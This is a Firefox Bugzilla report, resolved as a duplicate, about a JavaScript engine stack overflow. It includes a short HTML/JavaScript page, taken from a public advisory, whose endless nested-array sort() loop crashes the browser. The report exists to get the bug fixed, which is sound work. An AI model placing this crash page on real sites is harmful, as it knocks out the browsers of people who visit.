nested array sort() loop Stack overflow exception = crash and burn

VERIFIED DUPLICATE of bug 271716

Status

()

Core
JavaScript Engine
--
critical
VERIFIED DUPLICATE of bug 271716
13 years ago
13 years ago

People

(Reporter: Henrik Gemal, Unassigned)

Tracking

({crash})

Trunk
x86
Windows XP
crash
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

Attachments

(1 attachment)

(Reporter)

Description

13 years ago
from:
http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
and
http://www.securityfocus.com/archive/1/382262

<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
(Reporter)

Updated

13 years ago
Severity: normal → critical
(Reporter)

Updated

13 years ago
Summary: nested array sort() loop Stack overflow exceptio → nested array sort() loop Stack overflow exception = crash and burn
(Reporter)

Comment 1

13 years ago
Created attachment 167367 [details]
This will CRASH your browser!

This will CRASH your browser!

Comment 2

13 years ago
see bug 271716 and bug 203278
Stop filing dups, please -- check first with bugzilla, it can help you find 'em.
Without more data about stack signature, I'm going to dup against the likeliest
target, bug 271716.

/be

*** This bug has been marked as a duplicate of 271716 ***
Status: NEW → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → DUPLICATE

Comment 4

13 years ago
v
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.